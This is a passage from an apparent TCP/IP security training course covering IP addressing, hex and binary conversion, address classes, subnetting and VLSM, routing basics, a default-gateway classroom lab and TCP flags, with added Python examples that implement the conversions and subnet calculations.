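    sport, dport, length, _csum = struct.unpack(UDP_HDR, segment[:8])
    return {"sport": sport, "dport": dport, "payload": segment[8:length]}


def send_and_receive(app_data: bytes, src: str, dst: str, sport: int, dport: int) -> dict:
    """Walk the data down the stack on one host and back up on the other."""
    packet = encapsulate_ipv4(encapsulate_udp(app_data, sport, dport), src, dst, PROTO_UDP)
    net = decapsulate_ipv4(packet)
    if net["protocol"] != "UDP":
        raise ValueError("unexpected transport protocol")
    transport = decapsulate_udp(net["payload"])
    return {"wire_bytes": len(packet), "src": net["src"], "dst": net["dst"],
            "dport": transport["dport"], "data": transport["payload"]}


if __name__ == "__main__":
    # Constructed sample: a client at 192.168.10.1 sends 16 bytes to UDP port 69.
    print(send_and_receive(b"constructed data", "192.168.10.1", "10.0.0.5", 40000, 69))
```

The source address bytes at offset 12 of the IPv4 header come out as C0 A8 0A 01, the hexadecimal form of 192.168.10.1 that the conversion section of this topic works through, which is how a capture tool displays them.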
RFCs
With all the standards defined in the previous section, you may be asking where to go to find the standards. The answer is the RFCs. A Request For Comments (RFC) is the industry location for standards relating to TCP/IP and the Internet. RFCs are freely available documents to read and study, and if you ever want to go directly to the source, be sure to use the RFC.
Although you will find RFCs listed all over the Internet, to view them all online go to: www.rfc-editor.org. This is the website with a searchable index of all RFCs. There are several RFCs you should be familiar with, and that you should know by name to look up. This way you will not have to search hundreds of responses to find what you need. The RFCs you should know are:
The Internet Protocol (IP): RFC 791.
The Internet Control Message Protocol (ICMP): RFC 792.
The Transmission Control Protocol (TCP): RFC 793.
The User Datagram Protocol (UDP): RFC 768.
The Function of IP
The Internet Protocol (which works at the Network layer of both the OSI and the TCP/IP models), by definition, has a simple function. IP identifies the current host via an address and, using addressing, moves a packet of information from one host to another. Each host on the network has a unique IP address, and each packet the host sends will contain its own IP address and the IP address to which the packet is destined.
The packets are then directed, or routed, across the network, using the destination address, until they reach their final destination. The receiving host can read the IP address of the sender and send a response, if required.
Although it sounds straightforward, and does work, there are drawbacks. For instance, when packets are sent from one host to another, they may be received out of order. IP has no mechanism for dealing with that problem. Also, packets can get lost or corrupted during transmission, again a problem IP does not manage. These problems are left to an upper protocol to manage. Often that protocol will be TCP, as you will see in the following topic.
Binary, Decimal, and Hexadecimal Conversions
Even though you may be familiar with the concept of binary math, you may wish to review this section briefly. In binary, each bit has the ability to be either a 1 or a 0. In computers, these bits are stored in groups of 8. Since each bit can be either a 1 or a 0, each location is designated a power of 2. A byte, therefore, has binary place values from 2^0 through 2^7. In Figure 2-4, you can see the value of each of the 8 bits in a byte.
When the bits are presented as a byte, the value of each of the 8 locations is added to present you with the decimal equivalent. For example, if all 8 bits were 1s, such as 11111111, then the decimal value would be 255, or 128+64+32+16+8+4+2+1. Here are a few other quick binary to decimal conversions:
Binary 11000000 is decimal 192, or 128+64+0+0+0+0+0+0
Binary 10000000 is decimal 128, or 128+0+0+0+0+0+0+0
Binary 10000010 is decimal 130, or 128+0+0+0+0+0+2+0
Binary 01011010 is decimal 90, or 0+64+0+16+8+0+2+0
The IP addresses that are either manually or dynamically assigned to a host are 32-bit fields, often shown as four decimal values for ease of reading. For example, a common address would be 192.168.10.1. Each number is an 8-bit binary value, or an octet. In this example, the first octet is 192, the second 168, the third 10, and the fourth 1.
Even though the fourth octet is given a decimal value of 1, it is still given an 8-bit value in IP addressing. Each bit of the 32-bit address must be represented, so the computer sees a decimal 1 in an IP address as 00000001. Keeping this in mind, the full decimal IP address of 192.168.10.1 is seen by the computer as the binary IP address 11000000.10101000.00001010.00000001.
In tools that are designed to capture and analyze network traffic, the IP address is often represented in its hexadecimal (Hex) format. The ability to view and recognize addressing in Hex format is a useful skill to have when you are working with TCP/IP. In hexadecimal format, the IP address 192.168.10.1 is C0-A8-0A-01. The following is a quick summary on Hex conversions.
To convert the decimal address 192.168.10.1 to hexadecimal, convert each of its
octets, then combine the results, as follows:
1. Divide 192 by 16. The result is 12, with a remainder of 0. Because decimal
12 is the same as Hex C and decimal 0 is the same as Hex 0, decimal 192 is
equal to Hex C0.
2. Divide 168 by 16. The result is 10, with a remainder of 8. Because decimal
10 is the same as Hex A and decimal 8 is the same as Hex 8, decimal 168 is
equal to Hex A8.
3. Decimal 10 is the same as Hex A.
4. Decimal 1 is the same as Hex 1.
5. Combining the results of each conversion shows that decimal 192.168.10.1 is
equal to Hex C0A80A01.
Another way to derive this result is to first convert from decimal to binary, then convert binary to hexadecimal four bits at a time, and finally, combine the results, as shown here:
1. Decimal 192 is the same as binary 11000000.
2. Decimal 168 is the same as binary 10101000.
3. Decimal 10 is the same as binary 00001010.
4. Decimal 1 is the same as binary 00000001.
5. Binary 1100 (the first four bits of the first octet) is the same as Hex C.
6. Binary 0000 is the same as Hex 0.
7. Binary 1010 is the same as Hex A.
8. Binary 1000 is the same as Hex 8.
9. Binary 0000 is the same as Hex 0.
10. Binary 1010 is the same as Hex A.
11. Binary 0000 is the same as Hex 0.
12. Binary 0001 is the same as Hex 1.
13. Combining the Hex equivalents shows that decimal 192.168.10.1 is equal to
Hex C0A80A01.
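The conversions above, as an added Python example (not the course's own code) that implements both routes the text describes: binary to decimal by place value, decimal to hexadecimal by dividing by 16, and decimal to hexadecimal through four-bit groups, plus the reverse hex-to-dotted-decimal direction that reading a capture tool's output calls for. The function names are this example's own.

```python
HEX_DIGITS = "0123456789ABCDEF"
PLACE_VALUES = [128, 64, 32, 16, 8, 4, 2, 1]   # 2^7 down to 2^0


def octets(ip: str) -> list:
    """Split a dotted-decimal address and check that each octet is 0..255."""
    parts = [int(p) for p in ip.split(".")]
    if len(parts) != 4 or any(not 0 <= p <= 255 for p in parts):
        raise ValueError(f"not a valid IPv4 address: {ip}")
    return parts


def place_values(bits: str) -> list:
    """Value contributed by each bit position, e.g. 01011010 -> [0,64,0,16,8,0,2,0]."""
    if len(bits) != 8 or set(bits) - {"0", "1"}:
        raise ValueError("expected 8 binary digits")
    return [value if bit == "1" else 0 for bit, value in zip(bits, PLACE_VALUES)]


def binary_to_decimal(bits: str) -> int:
    """Add up the place values, as in 128+64+0+0+0+0+0+0 = 192."""
    return sum(place_values(bits))


def decimal_to_binary(n: int) -> str:
    """Repeated division by 2, kept as an 8-bit field so leading zeros survive."""
    digits = ""
    for _ in range(8):
        digits = str(n % 2) + digits
        n //= 2
    return digits


def ip_to_binary(ip: str) -> str:
    return ".".join(decimal_to_binary(o) for o in octets(ip))


def octet_to_hex_by_division(n: int) -> str:
    """Method 1: divide by 16; the quotient and remainder are the two hex digits."""
    quotient, remainder = divmod(n, 16)
    return HEX_DIGITS[quotient] + HEX_DIGITS[remainder]


def octet_to_hex_by_nibbles(n: int) -> str:
    """Method 2: convert to binary first, then each group of four bits is one hex digit."""
    bits = decimal_to_binary(n)
    return "".join(HEX_DIGITS[binary_to_decimal("0000" + bits[i:i + 4])] for i in (0, 4))


def ip_to_hex(ip: str, sep: str = "") -> str:
    """Dotted decimal -> hex, e.g. 192.168.10.1 -> C0A80A01 or C0-A8-0A-01."""
    return sep.join(octet_to_hex_by_division(o) for o in octets(ip))


def hex_to_ip(hex_addr: str) -> str:
    """Reverse direction: 8 hex digits (separators ignored) -> dotted decimal."""
    digits = hex_addr.replace("-", "").replace(":", "").upper()
    if len(digits) != 8 or set(digits) - set(HEX_DIGITS):
        raise ValueError("expected 8 hex digits")
    return ".".join(str(int(digits[i:i + 2], 16)) for i in range(0, 8, 2))


if __name__ == "__main__":
    for address in ("192.168.10.1", "10.0.0.1", "172.16.31.200"):
        print(address, ip_to_binary(address), ip_to_hex(address, "-"))
```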
IP Address Classes
There are five defined classes of IP addresses: Class A, Class B, Class C, Class D, and Class E. The details of each class are as follows:
Class A IP addresses use the first 8 bits of an IP address to define the network, and the remaining 24 bits to define the host. This means there can be more than 16 million hosts in each Class A network (2^24 - 2, because all 1s and all 0s cannot be used as host addresses). All Class A IP addresses will have a first octet of 0xxxxxxx in binary format. 10.10.10.10 is an example of a Class A IP address.
Class B IP addresses use the first 16 bits to define the network, and the remaining 16 bits to define the host. This means there can be more than 65,000 hosts in each Class B network (2^16 - 2). All Class B IP addresses will have a first octet of 10xxxxxx in binary format. 172.16.31.200 is an example of a Class B IP address.
Class C IP addresses use the first 24 bits to define the network, and the remaining 8 bits to define the host. This means there can be only 254 hosts in each Class C network (2^8 - 2). All Class C IP addresses will have a first octet of 110xxxxx in binary format. 192.168.10.1 is an example of a Class C IP address.
Class D IP addressing is not used for hosts, but is often used for multicasting (which will be discussed later), where there is more than one recipient. The first-octet binary value of a Class D IP address is 1110xxxx. 224.0.0.9 is an example of a Class D IP address.
Class E IP addressing is used for experimental functions and for future use. It does have a defined first-octet binary value as well. All Class E IP addresses have a first octet binary value of 11110xxx. 241.1.2.3 is an example of a Class E IP address.
Figure 2-4: IP address classes and their rst-octet values.
Private IP Addresses and Special-function IP Addresses
There are several ranges of IP addresses that are not used on the Internet. These addresses are known as private, or reserved, IP addresses. Defined in RFC 1918, any host on any network can use these addresses, but these addresses are not meant to be used on the Internet, and most routers will not forward them. By using these reserved IP addresses, organizations do not have to be as concerned with address conflicts. The defined private addresses for the three main address classes (A, B, and C) are:
Class A: 10.0.0.0 to 10.255.255.255
Class B: 172.16.0.0 to 172.31.255.255
Class C: 192.168.0.0 to 192.168.255.255
In addition to the private address ranges listed, there are a few other address ranges that have other functions. The first is the range of 127.0.0.0 to 127.255.255.255. This address range is used for diagnostic purposes, with the common address of 127.0.0.1 used to identify IP on the host itself. The second range is 169.254.0.0 to 169.254.255.255. This address range is used by Microsoft to allocate addresses to hosts, for Automatic Private IP Addressing (APIPA).
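The class rules and the reserved ranges above, combined in one added Python example (written for this edit, not taken from the course): an address is classified by its first-octet bit pattern, its per-network host capacity is computed the way the text does, and it is checked against the RFC 1918 private ranges and the two special-purpose ranges. The function and field names are this example's own, and the address 203.0.113.7 in the usage lines is from the documentation range, not a real host. One generalization beyond the text: RFC 1700 lists the whole 1111xxxx first-octet range as Class E, which contains the 11110xxx pattern given above, so the code matches on the first four bits.

```python
def ip_to_int(ip: str) -> int:
    parts = [int(p) for p in ip.split(".")]
    if len(parts) != 4 or any(not 0 <= p <= 255 for p in parts):
        raise ValueError(f"not a valid IPv4 address: {ip}")
    return (parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]


def in_range(ip: str, low: str, high: str) -> bool:
    return ip_to_int(low) <= ip_to_int(ip) <= ip_to_int(high)


# (class, leading first-octet bits, network bits). Classes D and E have no
# network/host split, so their network-bit count is None.
CLASS_RULES = [("A", "0", 8), ("B", "10", 16), ("C", "110", 24),
               ("D", "1110", None), ("E", "1111", None)]

# RFC 1918 private ranges, and the two special-purpose ranges from the text.
PRIVATE_RANGES = [("10.0.0.0", "10.255.255.255"),
                  ("172.16.0.0", "172.31.255.255"),
                  ("192.168.0.0", "192.168.255.255")]
SPECIAL_RANGES = {"loopback": ("127.0.0.0", "127.255.255.255"),
                  "APIPA": ("169.254.0.0", "169.254.255.255")}


def address_class(ip: str) -> str:
    """Classify by the leading bits of the first octet, e.g. 110xxxxx -> C."""
    first_octet_bits = format(ip_to_int(ip) >> 24, "08b")
    for name, pattern, _ in CLASS_RULES:
        if first_octet_bits.startswith(pattern):
            return name
    raise AssertionError("every 8-bit pattern matches one of the rules above")


def classify(ip: str) -> dict:
    """Class, host capacity and reserved-range membership for one address."""
    cls = address_class(ip)
    net_bits = next(bits for name, _, bits in CLASS_RULES if name == cls)
    # All-0s and all-1s host fields are unusable, hence the "- 2".
    hosts = (2 ** (32 - net_bits) - 2) if net_bits else None
    private = any(in_range(ip, lo, hi) for lo, hi in PRIVATE_RANGES)
    special = next((name for name, (lo, hi) in SPECIAL_RANGES.items()
                    if in_range(ip, lo, hi)), None)
    return {"address": ip, "class": cls, "network_bits": net_bits,
            "usable_hosts_per_network": hosts, "private": private,
            "special": special,
            # Usable as a public host address only if it is a host class and
            # falls in none of the reserved ranges.
            "public_host_address": cls in ("A", "B", "C") and not private and special is None}


if __name__ == "__main__":
    for addr in ("10.10.10.10", "172.16.31.200", "192.168.10.1", "224.0.0.9",
                 "241.1.2.3", "127.0.0.1", "169.254.3.4", "203.0.113.7"):
        print(classify(addr))
```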
The Subnet Mask
Along with an IP address, each host that uses TCP/IP has a subnet mask. The subnet mask is used during a process called ANDing to determine the network to which the host belongs. The way the mask identifies the network is by the number of bits allocated, or masked, for the network. A bit that is masked is identified with a binary value of 1.
By default, a Class A IP address has 8 bits masked to identify the network, a Class B IP address has 16 bits masked to identify the network, and a Class C IP address has 24 bits masked to identify the network. These default subnet masks use contiguous bits to create the full mask. The following table shows the default subnet masks for the three classes, first in binary, then in the more traditional dotted decimal format.
Default Subnet Masks
Class Binary Format Dotted Decimal Format
A 11111111.00000000.00000000.00000000 255.0.0.0
B 11111111.11111111.00000000.00000000 255.255.0.0
C 11111111.11111111.11111111.00000000 255.255.255.0
The subnet mask can be represented in different formats. For example, one common format is to list the IP address followed by the full subnet mask, such as this: 192.168.10.1 255.255.255.0. Another option, and one that is easier to write, is to count and record the number of bits that are used as 1s in the subnet mask. For example, in the default subnet mask for Class C, there are 24 bits designated as 1. So, to use the second format, list the IP address followed by a slash and the number of bits masked, such as this: 192.168.10.1/24.
Subnetting Example
In the event that you need to split a network into more than one range, such as having different buildings or floors, you will need to subdivide the network. The following example will step you through the process of splitting a network and creating the subnet mask necessary to support the resulting subnetworks.
Let's say you have been assigned the 10.0.0.0 network with the 255.0.0.0 subnet mask, and need to break this up into 12 network ranges to support, for example, the 12 major departments in your corporate building. Here's what you should do:
1. Determine how many bits, in binary, it takes to make up the number of subnetworks you need to create. In binary, 12 is 1100, so you will need 4 bits.
2. Take 4 bits from the host side of the subnet mask and assign them to the network side, effectively changing your subnet mask from 255.0.0.0 to 255.240.0.0.
As you know, the subnet mask tells you where the dividing line between network and host bits resides. You started with a network ID of 10.0.0.0 and subnet mask of 255.0.0.0, which in binary looks like this:
00001010.00000000.00000000.00000000 (IP address for network)
11111111.00000000.00000000.00000000 (subnet mask)
Your dividing line is at the end of the first octet (eight bits starting from the left). You have one big network with a network ID of 10.0.0.0, a range of usable addresses from 10.0.0.1 to 10.255.255.254, and a broadcast address of 10.255.255.255.
The new, divided network looks like this:
00001010.0000 0000.00000000.00000000 (IP address for network)
11111111.1111 0000.00000000.00000000 (subnet mask)
Notice that the network/host dividing line is now in the middle of the second octet. All of your networks will have binary addresses that will look like this: 00001010.xxxx yyyy.yyyyyyyy.yyyyyyyy, where x represents one of the variable bits used to create your subnetworks and y represents a bit on the host side of the address.
3. Determine the subnetwork addresses by changing the value of the x bits. The first possible permutation is the 00001010.0000 network; the second is the 00001010.0001 network, and so forth. The following table lists all of the possible subnetwork addresses (notice the pattern?).
Subnetwork Binary Address Decimal Address
First 00001010.0000 0000.00000000.00000000 10.0.0.0
Second 00001010.0001 0000.00000000.00000000 10.16.0.0
Third 00001010.0010 0000.00000000.00000000 10.32.0.0
Fourth 00001010.0011 0000.00000000.00000000 10.48.0.0
Fifth 00001010.0100 0000.00000000.00000000 10.64.0.0
Sixth 00001010.0101 0000.00000000.00000000 10.80.0.0
Seventh 00001010.0110 0000.00000000.00000000 10.96.0.0
Eighth 00001010.0111 0000.00000000.00000000 10.112.0.0
Ninth 00001010.1000 0000.00000000.00000000 10.128.0.0
Tenth 00001010.1001 0000.00000000.00000000 10.144.0.0
Eleventh 00001010.1010 0000.00000000.00000000 10.160.0.0
Twelfth 00001010.1011 0000.00000000.00000000 10.176.0.0
Thirteenth 00001010.1100 0000.00000000.00000000 10.192.0.0
Fourteenth 00001010.1101 0000.00000000.00000000 10.208.0.0
Fifteenth 00001010.1110 0000.00000000.00000000 10.224.0.0
Sixteenth 00001010.1111 0000.00000000.00000000 10.240.0.0
For the first network, the network ID is 10.0.0.0 with a subnet mask of 255.240.0.0. The first usable address is 10.0.0.1, and the last usable address is 10.15.255.254. The broadcast address is 10.15.255.255 (the next possible IP address would be 10.16.0.0, which is the network ID of the second network). The second network has an ID of 10.16.0.0, a usable range of 10.16.0.1 to 10.16.255.254, and a broadcast address of 10.16.255.255.
Notice that you needed only 12 networks, but you have 16. That can happen, depending on the number of networks needed. For example, if you had needed 20 networks, you would have needed to move the network/host dividing line over 5 bits to the right (20 in binary is 10100, so 5 bits must be used). In that case, you would have had a subnet mask of 255.248.0.0 (instead of the 255.240.0.0 that you used for the first example), which would have given you 32 subnetworks, even though you needed only 20. Consider it room for corporate growth!
Lesson 2: Advanced TCP/IP 41
Note that any combination of addressing can be represented in different text. For example, you may come across a resource that defines the IP address in decimal, and the subnet mask in hexadecimal. You must be able to quickly recognize the addressing as defined. Use the following task to test your ability to quickly perform these conversions.
TASK 2A-1
Layering and Address Conversions
1. Describe how layering is beneficial to the function of networking.
By using a layered model, network communications can be broken into smaller chunks. These smaller chunks can each have a specific purpose, or function, and in the event an error happens in one chunk, it is possible that only that error be addressed, instead of starting over from scratch.
2. If you have an IP address of 192.168.10.1 and a subnet mask of FF-FF-
00-00, to which IP network does your computer belong? Provide both
decimal and Hex notations.
In decimal, the network address is 192.168.0.0; in Hex, the network address
is C0-A8-00-00.
3. If you have an IP address of C0-A8-0A-01 and a subnet mask of /16, to
which IP network does your computer belong? Provide both decimal
and Hex notations.
In decimal, the network address is 192.168.0.0; in Hex the network address
is C0-A8-00-00.
Routing
You will get into routing in more detail later, but at this stage, you will address
the basics. Being familiar with a network and how one host will communicate
with another host within the same network, what do you think will happen if a
host needs to send information to a host that is not in its network?
This is exactly the situation where routing is needed. You need to route that information from your network to the receiving host's network. Of course, the device that makes this possible is the router. The first router you will encounter on your way out of your network is the default gateway. This is the device that your computer will send all traffic to, once it determines that the destination host is not local (on the same network as itself). After the default gateway gets a packet of information destined for host User1 on network X, it looks at its routing table (think of this as a sort of directory, telling the router that traffic destined for networks C, G, F, and X should go out interface 1, traffic destined for networks E, A, B, and R should go out interface 2, and so forth), then the router forwards the packet out through interface 1. The destination network may or may not be attached to interface 1; the router doesn't really care at this point, it just forwards the packet on according to the information in its routing table. This process repeats from one router to the next until the packet finally reaches the router that is attached to the same network as the destination host. When the packet reaches this router, which is usually also the destination host's default gateway, it is sent out on the network as a unicast directed to the destination host User1.
router: An interconnection device that is similar to a bridge but serves packets or frames containing certain protocols. Routers link LANs at the Network Layer.
VLSM and CIDR
The standard methods of subnet masking discussed earlier are effective; however,
there are instances where further subdividing is required, or more control of the
addressing of the network is desired. In these cases, you can use either of the
following two options: Variable Length Subnet Masking (VLSM) or Classless
Interdomain Routing (CIDR).
Think back to the previous example of subnet masking. In particular, let's take a closer look at the fourth network. It was intended to be used by the IT staff; however, they want to break the rather large network block given to them into smaller, more manageable blocks. Specifically, they need five smaller subnetworks to be created from their network block of 10.48.0.0 with a subnet mask of 255.240.0.0.
This time, lets represent the IP addresses and subnet masks using the slash
method: 10.48.0.0/12. Notice the IP address stays the same, but we replace the
subnet mask with /12 to tell others that the subnet mask has 12 1s in it (which, of
course, corresponds to 255.240.0.0).
Now, back to the IT staff's networking issue. You have an already subnetted network (10.48.0.0/12) that you would like to split into five smaller networks. To begin, you need to ask the same starting question: How many bits does it take to make 5? In binary, 5 is 101, so you will need three bits. Then, add three bits to the present subnet mask (don't worry that it has already been subnetted before; that doesn't matter). So, now you have 10.48.0.0/15 as your first network address and new subnet mask.
The new variable range is 00001010.0011xxx y.yyyyyyyy.yyyyyyyy, where the
binary numbers will not change, x represents the variable bits that will make up
the networks, and y designates the host bits.
So, what are the new network addresses?
Subnetwork Binary Address Decimal Address
First 00001010.0011000 0.00000000.00000000 10.48.0.0
Second 00001010.0011001 0.00000000.00000000 10.50.0.0
Third 00001010.0011010 0.00000000.00000000 10.52.0.0
Fourth 00001010.0011011 0.00000000.00000000 10.54.0.0
Fifth 00001010.0011100 0.00000000.00000000 10.56.0.0
Sixth 00001010.0011101 0.00000000.00000000 10.58.0.0
Seventh 00001010.0011110 0.00000000.00000000 10.60.0.0
Eighth 00001010.0011111 0.00000000.00000000 10.62.0.0
For the first network, the network ID is 10.48.0.0, the usable addresses are 10.48.0.1 to 10.49.255.254, and the broadcast address is 10.49.255.255; for the second, the network ID is 10.50.0.0, the usable addresses are 10.50.0.1 to 10.51.255.254, and the broadcast address is 10.51.255.255, and so forth. Did you notice that you have eight possible networks when you needed only five? Again, you can consider it just having more room for expansion.
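As an added example that is not part of the course text, the following Python works through both subnetting exercises above (10.0.0.0/8 split for 12 networks, then the VLSM split of 10.48.0.0/12 for 5) using the text's own "count the bits in the number of networks" rule, and also handles the mask and address notations from Task 2A-1 (dotted decimal, dashed hex, /prefix). It uses only the standard-library ipaddress module; the function names are my own.

```python
import ipaddress


def parse_mask(mask):
    """Prefix length of a mask given as /N, dotted decimal, or dashed hex (FF-FF-00-00)."""
    mask = mask.strip()
    if mask.startswith("/"):
        prefix = int(mask[1:])
        if not 0 <= prefix <= 32:
            raise ValueError(f"prefix out of range: {mask}")
        return prefix
    if "-" in mask:  # hex notation such as FF-FF-00-00
        dotted = str(ipaddress.IPv4Address(int(mask.replace("-", ""), 16)))
    else:
        dotted = mask
    # IPv4Network rejects a mask whose 1 bits are not contiguous from the left
    return ipaddress.IPv4Network(f"0.0.0.0/{dotted}").prefixlen


def parse_address(address):
    """Accept an IPv4 address as dotted decimal or dashed hex (C0-A8-0A-01)."""
    address = address.strip()
    if "-" in address:
        return ipaddress.IPv4Address(int(address.replace("-", ""), 16))
    return ipaddress.IPv4Address(address)


def to_hex(address):
    """Render an IPv4Address in the dashed hex notation used in Task 2A-1."""
    return "-".join(f"{octet:02X}" for octet in address.packed)


def network_of(address, mask):
    """Network ID of a host in decimal and hex, whatever notation address and mask arrive in."""
    net = ipaddress.IPv4Network(f"{parse_address(address)}/{parse_mask(mask)}", strict=False)
    return str(net.network_address), to_hex(net.network_address)


def subnet_bits(needed):
    """The text's rule: count the bits in the binary form of the number of networks needed,
    so 12 (1100) needs 4 bits and 5 (101) needs 3. An exact power of two such as 16 (10000)
    gets one bit more than strictly necessary under this rule."""
    if needed < 1:
        raise ValueError("need at least one network")
    return needed.bit_length()


def plan_subnets(network, needed):
    """Split `network` into at least `needed` equal subnets; returns one row per resulting subnet."""
    base = ipaddress.IPv4Network(network)
    bits = subnet_bits(needed)
    if base.prefixlen + bits > 30:  # keep at least two usable host addresses per subnet
        raise ValueError("not enough host bits left to subnet this far")
    rows = []
    for sub in base.subnets(prefixlen_diff=bits):
        rows.append({
            "network": str(sub.network_address),
            "mask": str(sub.netmask),
            "prefix": sub.prefixlen,
            "first": str(sub.network_address + 1),
            "last": str(sub.broadcast_address - 1),
            "broadcast": str(sub.broadcast_address),
            # binary form, to compare against the tables in the text
            "binary": ".".join(f"{octet:08b}" for octet in sub.network_address.packed),
        })
    return rows


if __name__ == "__main__":
    # The two exercises from the text: 10.0.0.0/8 for 12 networks, then 10.48.0.0/12 for 5.
    for network, needed in (("10.0.0.0/8", 12), ("10.48.0.0/12", 5)):
        rows = plan_subnets(network, needed)
        print(f"{network} split for {needed} networks gives {len(rows)} subnets of /{rows[0]['prefix']}")
        for row in rows:
            print(f"  {row['binary']}  {row['network']:<12} {row['first']:<14} {row['last']:<16} {row['broadcast']}")
    print(network_of("192.168.10.1", "FF-FF-00-00"))  # Task 2A-1, question 2
    print(network_of("C0-A8-0A-01", "/16"))           # Task 2A-1, question 3
```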
X-casting
When a packet is sent from one host to another, the process of routing functions
and the packet is sent as dened. However, the process is different if one host is
trying to reach more than one destination, or if one message is to be received by
every other host in the network. These types of communication are referred to as
broadcasting, multicasting, and unicasting.
Unicast is a term that was created after multicasting and broadcasting were
already dened. A unicast is a directed communication between a single
transmitter and a single receiver. This is how most communication between
two hosts happens, with Host A specically communicating with Host B.
A broadcast is a communication that is sent out from a single transmitting host and is destined for all possible receivers on a segment (generally, everyone in the network, since the routers that direct traffic from one network to another are generally used to stop broadcasts, thereby creating broadcast domain boundaries). Broadcasting can be done for many reasons, such as locating another host. For a MAC broadcast, the broadcast address used is FF:FF:FF:FF:FF:FF. For an IP broadcast, the address used is based on the network settings. For example, if you are on network 192.168.10.0/24, the broadcast address is 192.168.10.255.
A multicast is a communication that is sent out to a group of receivers on the network. Multicasting is often implemented as a means for directing traffic from the presenter of a video conference to the audience. In comparison to the broadcast, which all receivers on the segment will receive, those who wish to receive a multicast must join a group to do so. Group membership is often very dynamic and controlled by a user or an application. Currently, Class D addresses are used for multicasting purposes. Remember, Class D has IP addresses in the range of 224.0.0.0 to 239.255.255.255.
TASK 2A-2
Routers and Subnetting
1. You are using a host that has an IP address of 192.168.10.23 and a
subnet mask of 255.255.255.0. You are trying to reach a host with the IP
address 192.168.11.23. Will you need to go through a router? Explain
your response.
Yes, you will need to go through a router. Your subnet mask defines you as belonging to network 192.168.10.0, and the remote host you are trying to reach does not belong to your network.
2. Boot your computer to Windows Server 2003, and log on as Administrator, with a blank (null) password.
3. Choose Start→Settings→Network Connections. Right-click the network interface and choose Properties.
4. Select Internet Protocol (TCP/IP) and click Properties.
5. Click the Advanced button, and verify that the IP Settings tab is displayed.
Under Default Gateways, record the IP address here:
For the LEFT side of the classroom, the Default Gateway is 172.16.0.1. For
the RIGHT side, it is 172.18.0.1.
6. Select the Default Gateway IP address you just recorded, and click
Remove. Click OK twice and click Close twice.
7. Open a command prompt and ping an address that is not on your local
network. For instance, if you are on the LEFT side of the classroom, you
could ping an address in the 172.18.10.0 network, and if you are on the
RIGHT side of the classroom, you could ping an address in the 172.16.10.0
network.
8. Observe the message you receive. The text Destination Host unreachable
is displayed. Your computer knows that the ping packet is supposed to go to
a computer that is outside your local network but it does not know how to
get it there.
9. Switch to the Network Connections Control Panel and display the properties of the network interface.
10. Select Internet Protocol (TCP/IP), click Properties, and then click
Advanced. On the IP Settings tab, click the Add button found in the
Default Gateway area.
11. In the TCP/IP Gateway Address box, enter the IP address you recorded
earlier in the task and click Add. Click OK twice and click Close twice.
12. Switch back to the command prompt and try to ping the remote address
again.
13. Observe the message you receive. This time, as long as the other computer's default gateway is correctly configured, you should be successful in pinging the remote computer. This is because your computer now knows to send traffic to the router if that traffic is destined for another network. (How the routers know where to send the traffic is covered later in the course.) Contact your instructor if your ping attempt is not successful.
14. Close all open windows.
Be prepared to diagram or otherwise explain the classroom setup. The recommended classroom layout is shown in the figure in the setup.
Students must be able to ping all computers within the classroom for the remaining tasks to work properly. If any students are not successful in the second ping attempt, help them troubleshoot the issue.
Topic 2B
Analyzing the Three-way Handshake
Although a great deal of emphasis is given to IP due to the addressing and masking issues, TCP deserves equal attention from the security professional. In addition to TCP, the other protocol that functions as a transport protocol is UDP. This topic will concentrate on TCP; however, a brief discussion on UDP is warranted. The following table provides a brief comparison of the two protocols.
Comparing TCP and UDP
TCP UDP
Connection-oriented Connectionless
Slower communications Faster communications
Considered reliable Considered unreliable
Transport Layer Transport Layer
TCP provides a connection-oriented means of communication, whereas UDP provides connectionless communication. The connection-oriented function of TCP means it can ensure reliable transmission, and can recover if transmission errors occur. The connectionless function of UDP means that packets are sent with the understanding they will make it to the other host, with no means of ensuring the reliability of the transmission.
UDP is considered faster because less work is done between the two hosts that
are communicating. Host 1 simply sends a packet to the address of host 2. There
is nothing built into UDP to provide for host 1 checking to see if host 2 received
the packet, or for host 2 sending a message back to host 1, acknowledging
receipt.
TCP provides the functions of connection-oriented communication by using features such as the three-way handshake, acknowledgements, and sequence numbers. In addition to these features, a significant part of TCP is the use of control flags. There are six TCP control flags in a TCP header, each with a specific meaning.
security: A condition that results from the establishment and maintenance of protective measures that ensure a state of inviolability from hostile acts or influences.
TCP Flags
The TCP flags are: SYN, ACK, FIN, RESET, PUSH, and URGENT. These flags may also be identified as S, ack, F, R, P, and urg. Each of these flags occupies the space of one bit in the header, and if they are assigned a value of 1, they are considered on. The function of each flag is identified as follows:
The SYN, or S, flag represents the first part of establishing a connection. The synchronizing of communication will generally be in the first packet of communication.
The ACK, or ack, flag represents acknowledgement of receipt of data from the sending host. This is sent during the second part of establishing a connection, in response to the sending host's SYN request.
The FIN, or F, flag represents the sender's intentions of terminating the communication in what is known as a graceful manner.
The RESET, or R, flag represents the sender's intentions to reset the communication.
The PUSH, or P, flag is used when the sending host requires data to be pushed directly to the receiving application, and not fill in a buffer.
The URGENT, or urg, flag represents that this data should take precedence over other data transmissions.
Sequence and Acknowledgement Numbers
In addition to the TCP flags, another critical issue of TCP is that of numbers: sequence and acknowledgement numbers, to be specific. Because TCP has been defined as a reliable protocol that has the ability to provide for connection-oriented communication, there must be a mechanism to provide these features. Sequence and acknowledgement numbers are what provide this.
Sequence Numbers
The sequence number is found in the TCP header of each TCP packet and is a 32-bit value. These numbers give the two hosts a common ground for communication, and allow the hosts to identify packets sent and received. If a large web page requires several TCP packets for transmission, sequence numbers are used by the receiving host to reassemble the packets in the proper order and provide the full web page for viewing.
When a host sends the request to initiate a new connection, an Initial Sequence Number (ISN) must be chosen. There are different algorithms by different vendors for the choosing of an ISN; however, RFC 793 states that the ISN is to be a 32-bit number that increments by one every 4 microseconds.
Acknowledgement Numbers
The acknowledgement number is also found in the TCP header of each TCP packet, and is also a 32-bit value. These numbers allow the two hosts to be given a receipt of data delivery. An acknowledgement number is in the packet header in response to a sequence number in the sending packet.
In the event that the sending host does not receive an acknowledgement for a transmitted packet in the defined timeframe, the sender will retransmit the packet. This is how TCP provides reliable delivery. If a packet seems to have been lost, the sender will retransmit it.
Connections
All communication in TCP/IP is done with connections between two hosts. Each connection is opened (or established), data is sent, and the connection is closed (or torn down). These connections have very specific rules they must follow. There are two different states of the open portion of this process: Passive Open and Active Open.
Passive Open is when a running application tells TCP that it is ready to receive inbound requests via TCP. The application is assuming inbound requests are coming, and is prepared to serve those requests. This is also known as the listening state, as the application is listening for requests to communicate.
